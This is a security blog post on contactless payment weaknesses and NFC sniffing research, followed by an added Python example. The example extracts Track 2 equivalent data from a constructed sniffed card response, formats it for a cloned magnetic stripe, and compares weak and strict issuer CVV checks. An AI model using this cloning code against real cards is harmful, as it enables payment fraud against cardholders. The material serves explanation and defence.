Contactless payments: Less contact may mean less security
By Abby Ross, Associate Partner, X-Force Red
When the pandemic hit, the use of contactless payments soared, jumping from 28 percent to 46 percent, according to a recent report. The increase isn't surprising considering a contactless environment fosters social distancing and no shared PIN pads, two cornerstones of pandemic living. Not to mention the ease-of-use factor. I never enjoy standing at the grocery line checkout with my two young children begging for candy bars while I frantically dig through my wallet in search of my credit card as a line of shoppers gathers behind me, wondering why I am taking so long. The technology has been a blessing for many consumers. From a cybersecurity perspective, however, it can be a curse.
Consumers were no strangers to contactless payments prior to the pandemic. Merchants encouraged their use, albeit with limits. Originally, in some countries, shoppers were required to perform a chip and PIN transaction after a certain number of contactless transactions. For example, in the United Kingdom, consumers had to perform one chip and PIN transaction for every five contactless payments. The restriction capped how many times a lost, stolen or cloned card could be used before the cardholder had to prove possession of the PIN. Then the pandemic hit. Consumers avoided touching PIN pads and wanted to keep their distance, and the importance of contactless payments skyrocketed. The technology became so popular that many retailers and payment providers removed the transaction limits. Wanting a piece of the pie, vendors that were not traditional banks and lacked experience in the payments space created their own payment terminals, cards and processes for contactless payments.
Because contactless payments evolved from chip and PIN technology, merchants and consumers alike assumed security evolved with it. Unfortunately, that wasn't always the case, especially with inexperienced vendors in the mix. NFC, the radio technology that carries a contactless transaction, did not change what the EMV chip does, but it did change what the card sends: the "Track 2 equivalent" data a chip returns over the air carries its own card verification value (often called the iCVV), which deliberately differs from the CVV encoded on the magnetic stripe (CVV1). That difference is what stops data captured from the chip from being re-encoded onto a stripe. The contactless protocol is stronger than a stripe read because each transaction also carries a cryptogram, but the CVV separation only protects anyone if the issuer's backend actually checks which CVV it received over which channel. Where those checks weren't implemented correctly, attackers could bypass the authentication process.
Our X-Force Red lead hardware hacker Adam Laurie researched the technology to see for himself. He discovered that he could "sniff" an NFC conversation between a contactless payment card and a reader, meaning he could capture the communications (and data) going back and forth between the card and the terminal. An attacker in the same position could then re-encode the captured card data onto a magnetic stripe card and use the clone to make fraudulent purchases.
The rapid demand for contactless payment systems has led to sloppy implementations with security holes. Adam says that magnetic stripe technology is also less secure than NFC. If retailers stopped accepting magnetic stripe as a reasonable mode of payment, sniffed contactless data would have nowhere to be replayed, which would close off this cloning path and reduce the payoff from sniffing and similar attacks.
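The following example, which is added here and is not code from the article or from X-Force Red, walks through the two halves of the problem described above: an attacker lifting the Track 2 equivalent data (EMV tag 57) from a sniffed READ RECORD response and writing it out as a magnetic stripe track, and an issuer backend deciding whether to honour that clone. The APDU response, the card's CVV values and the position of the CVV inside the discretionary data are all constructed for illustration; the ISO 8583 entry-mode codes and the tag numbers are real, the `ISSUER_CARDS` table and the two `authorize_*` functions are hypothetical.

```python
"""
Added example (not from the article): why sniffed contactless card data becomes
a working magstripe clone when the issuer backend does not keep the chip-side
CVV (iCVV) and the stripe-side CVV (CVV1) apart. All card data is constructed.
"""
import re

TAG_PAN = 0x5A      # EMV: Application Primary Account Number
TAG_TRACK2 = 0x57   # EMV: Track 2 Equivalent Data (BCD, 'D' separator, 'F' pad)

POS_ENTRY_SWIPE = "90"        # ISO 8583 DE22 point-of-service entry: magstripe read
POS_ENTRY_CONTACTLESS = "07"  # ISO 8583 DE22: contactless EMV


def parse_tlv(data: bytes) -> dict:
    """Minimal BER-TLV parser (1- or 2-byte tags, short and long definite
    lengths). Constructed templates such as 70 are flattened into the result."""
    out, i = {}, 0
    while i < len(data):
        tag = data[i]; i += 1
        if tag & 0x1F == 0x1F:                       # two-byte tag, e.g. 9F6B
            tag = (tag << 8) | data[i]; i += 1
        length = data[i]; i += 1
        if length & 0x80:                            # long form length
            n = length & 0x7F
            length = int.from_bytes(data[i:i + n], "big"); i += n
        value = data[i:i + length]; i += length
        first_byte = tag >> 8 if tag > 0xFF else tag
        if first_byte & 0x20:                        # constructed: recurse
            out.update(parse_tlv(value))
        else:
            out[tag] = value
    return out


def track2_from_tlv(record: dict) -> str:
    """Turn tag 57 into the text a stripe encoder writes on track 2:
    PAN=YYMMSSS<discretionary>, with the BCD 'D' separator replaced by '='."""
    digits = record[TAG_TRACK2].hex().upper().rstrip("F")
    return digits.replace("D", "=")


def split_track2(track2: str) -> dict:
    m = re.fullmatch(r"(\d{12,19})=(\d{4})(\d{3})(\d*)", track2)
    if not m:
        raise ValueError("malformed track 2")
    pan, expiry, service_code, disc = m.groups()
    # Assumption for this example: the last three discretionary digits hold
    # the card verification value (CVV1 on a genuine stripe, iCVV in tag 57).
    return {"pan": pan, "expiry": expiry, "service_code": service_code, "cvv": disc[-3:]}


# Constructed READ RECORD response as a sniffer would capture it: a 70 template
# holding tag 5A (PAN) and tag 57 (track 2 equivalent whose CVV field is the iCVV 317).
SNIFFED_RECORD = bytes.fromhex(
    "701C"
    "5A084111111111111111"
    "57104111111111111111D25122010000317F"
)

# Constructed issuer record. A real issuer derives CVV1 and iCVV from the PAN,
# expiry and service code under separate keys; here they are literals.
ISSUER_CARDS = {"4111111111111111": {"cvv1": "842", "icvv": "317"}}


def clone_from_sniff(record: bytes) -> str:
    """Attacker side: lift tag 57 from the capture and format it for a blank stripe."""
    return track2_from_tlv(parse_tlv(record))


def authorize_weak(track2: str, entry_mode: str) -> bool:
    """Backend that accepts a verification value from either channel: the clone works."""
    t = split_track2(track2)
    card = ISSUER_CARDS.get(t["pan"])
    return bool(card) and t["cvv"] in (card["cvv1"], card["icvv"])


def authorize_strict(track2: str, entry_mode: str) -> bool:
    """Backend that ties the CVV to its channel. A swipe must carry CVV1, so
    chip-sourced data (iCVV) arriving as a swipe is recognised as a clone.
    (Genuine contactless traffic is additionally checked via the per-transaction
    cryptogram, tag 9F26, which is out of scope for this example.)"""
    t = split_track2(track2)
    card = ISSUER_CARDS.get(t["pan"])
    if not card:
        return False
    expected = card["cvv1"] if entry_mode == POS_ENTRY_SWIPE else card["icvv"]
    return t["cvv"] == expected


def demo() -> dict:
    cloned = clone_from_sniff(SNIFFED_RECORD)
    return {
        "track2": cloned,
        "weak_backend_accepts_clone": authorize_weak(cloned, POS_ENTRY_SWIPE),
        "strict_backend_accepts_clone": authorize_strict(cloned, POS_ENTRY_SWIPE),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The weak backend is the "CVV codes not implemented correctly" case: it treats iCVV and CVV1 as interchangeable, so the swiped clone authorizes. The strict backend declines the same track data when it arrives as a swipe, while still accepting it over the contactless channel, which is the behaviour the iCVV/CVV1 split was designed to give.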
If you think Adam's sniffing attack sounds complicated, we welcome you to watch his virtual Black Hat presentation titled "Contactless payments: One sniff and attackers are in."
Another virtual session that may be of interest is X-Force IR Executive Consultant and Global Remediation Lead Andrew Gorecki's presentation "A Race to Diminish: Beating the Adversaries Once They Are In."
If you are attending the show, stop by IBM Security's booth #1647 to learn more about X-Force's offensive and defensive security services.